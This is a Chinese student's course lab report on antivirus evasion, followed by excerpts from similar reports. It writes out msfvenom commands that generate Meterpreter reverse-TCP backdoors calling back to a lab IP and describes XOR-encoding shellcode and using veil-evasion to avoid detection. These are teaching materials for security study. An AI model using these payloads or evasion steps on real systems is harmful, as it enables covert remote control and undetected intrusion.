20155220 网络攻防技术 实验三 免杀原理与实践

网络攻防技术 实验三 免杀原理与实践

使用msf生成后门程序的检测

  • 首先我们对上次实验生成的后门exe,利用VirSCAN进行检测

  • 然后我们利用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.150.138(kali ip) lport=5220 x> 5220_backjar.jar

    生成jar文件,进行检测。

使用veil-evasion生成反弹链接的可执行文件

  • 首先我们先对veil-evasion进行安装,详情可参考老师博客
  • 安装好之后,我们利用veil,指令打开veil-evasion
  • 依次用use evasionlist payloads,进入到payloads模板界面
  • 随便选择一个模板,将其复制,然后输入use 5(你所复制的模板)
  • 然后输入set LHOST kali-ipset LPORT 5220对其进行配置,然后输入generate,生成。

利用shellcode编程实现免杀

  • 首先我们输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.138 LPORT=443 -f c

  • 根据老师所给的,将其变成C语言文件,进行编译
  • 进行回连,回连成功

对shellcode进行更改

  • 我首先对其进行异或,我做的为异或0x83

  • 回连成功

  • 进行检测,如图

    加壳

  • 加壳由于一系列原因失败了,所以很难受。

    基础问题

  • 1.杀软是如何检测出恶意代码的?
  • 基于特征码的检测:杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据已检测出或网络上公布的病毒,对其提取特征码,记录成病毒库,检测到程序时将程序与特征码比对即可判断是否是恶意代码。
  • .基于行为的恶意软件检测:在程序运行的状态下(动态)对其行为进行监控,如果有敏感行为会被认为是恶意程序,是一种动态的监测与捕捉。
  • 2.免杀是做什么?
  • 免杀是将二进制码隐藏,或者变形
  • 3.免杀的基本方法有哪些?
  • 改变特征码
  • 对exe可执行文件加壳:压缩壳 加密壳
  • 基于payload重新编译生成可执行文件

    实践总结与体会

    本次实验过程颇为曲折,首先在下载veil过程中无法安装,再三尝试后只得拷了一个虚拟机;

    然后对shellcode代码更改后,回连出现了失败,在组长的指导下顺利解决了该问题。

    通过本次实验,突然发现稍稍修改病毒就可以骗过好多杀毒软件,让我对现在电脑的安全性有了重新的审视;

    最后我还是赶紧去给电脑杀毒了。

原文地址:https://www.cnblogs.com/20155220wsq/p/8783368.html

时间: 2024-10-24 13:55:44

20155220 网络攻防技术 实验三 免杀原理与实践的相关文章

2017-2018-2 20155225《网络对抗技术》实验三 免杀原理与实践

2017-2018-2 20155225<网络对抗技术>实验三 免杀原理与实践 免杀工具1--msfvenom使用编码器 知道msfvenom的编码原理,就知道不管迭代编码多少次都没用,总有一段译码指令在头部,这个头部就在特征库里,一下就检测出来了. 但还是试试吧.编码方式选shikata_ga_nai:迭代编码10次:还可以用-x使用自定义可执行文件模板,那就选一个windows下计算器程序(calc.exe)作为模板. 所以,指令是这样的: msfvenom -p windows/mete

2019-2020-2 20175326 李一潇《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175326李一潇<网络对抗技术> Exp3 免杀原理与实践 一.实验内容 免杀尝试 正确使用msf编码器 msfvenom生成如jar之类的其他文件 veil 加壳 使用C + shellcode编程 使用其他课堂未介绍方法 通过组合应用各种技术实现恶意代码免杀 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.实验原理 Virscan:集成了60多个商业杀毒软件的扫描引擎.可以上传免杀处理过的程序进行检测.是此次实验用到的检查方

2019-2020-2 网络对抗技术 20175209 Exp3 免杀原理与实践

2019-2020-2 网络对抗技术 20175209 Exp3 免杀原理与实践 一.实验任务 方法 正确使用msf编码器 msfvenom生成如jar之类的其他文件 veil 加壳工具 使用C + shellcode编程 使用其他课堂未介绍方法 通过组合应用各种技术实现恶意代码免杀 (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.基础问题回答 杀软是如何检测出恶意代码的 基于

2019-2020-2 20175226王鹏雲《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175226王鹏雲<网络对抗技术>Exp3 免杀原理与实践 实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具.使用C + shellcode编程或使用其他课堂未介绍方法自己利用shellcode编程等免杀工具或技巧 2.通过组合应用各种技术实现恶意代码免杀 (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明

2019-2020-2 20175218陈敬勇 《网络对抗技术》 Exp3 免杀原理与实践

2019-2020-2 20175218陈敬勇 <网络对抗技术> Exp3 免杀原理与实践 一.实验任务 方法 正确使用msf编码器 msfvenom生成如jar之类的其他文件 veil 加壳工具 使用C + shellcode编程 使用其他课堂未介绍方法 通过组合应用各种技术实现恶意代码免杀 如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.实验准备 基础知识 Msfvenom使用

2019-2020-2 20175327《网络对抗技术》Exp3 免杀原理与实践

目录 一.学习目标 二.基础知识 1.1 恶意软件检测机制 1.1.1 基于特征码的检测 1.1.2 启发式恶意软件检测 1.1.3 基于行为的恶意软件检测 三.实验步骤 1.使用msf编码器msfvenom生成后门程序 (1)正确使用msf编码器 (2)msfvenom生成如jar之类的其他文件 (2)mfsvenom生成php文件 (3)veil (4)用shellcode编程生成后门程序 (5)加壳 加密壳(Hyperion) (6)使用其他课堂未介绍方法 2.通过组合应用各种技术实现恶意

2019-2020-2 20175321吴丁成《网络对抗技术》Exp3 免杀原理与实践

目录 2019-2020-2 20175321吴丁成<网络对抗技术>Exp3 免杀原理与实践 一.实践目标 二.基础知识 三.实验内容 1.正确使用免杀工具或技巧 1.1正确使用msf编码器 1.2msfvenom生成如jar之类的其他文件 1.3使用veil-evasion生成后门程序 1.4使用C+shellcode编程生成后门程序 1.5加壳工具 1.6其他方法 2.通过组合应用各种技术实现恶意代码免杀 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

2019-2020-2 20175316盛茂淞《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175316盛茂淞<网络对抗技术>Exp3 免杀原理与实践 一.实验目标 熟悉后门的概念 使用netcat实现win,linux之间的后门连接 掌握meterpreter的应用 了解MSF POST 模块的应用 学会win,linux的后门启动方式 二.基础问题回答 1.杀软是如何检测出恶意代码的? 基于特征码的检测(需要定期更新病毒库) 启发式恶意软件检测(实时监控,开销较大) 基于行为的恶意软件检测(如API监控) 2.免杀是做什么? 通过伪装,加解密,对she

2017-2018-4 20155317《网络对抗技术》EXP3 免杀原理与实践

2017-2018-4 20155317<网络对抗技术>EXP3 免杀原理与实践 一.问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 2.实践 (1) 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 首先尝试一下自己上个实验做出的后门程序 果然是不堪一击...拿去检测一下 装上veil尝试一下结果会如何 : 温馨提示一下,刚开始我是用的自己装的64的ka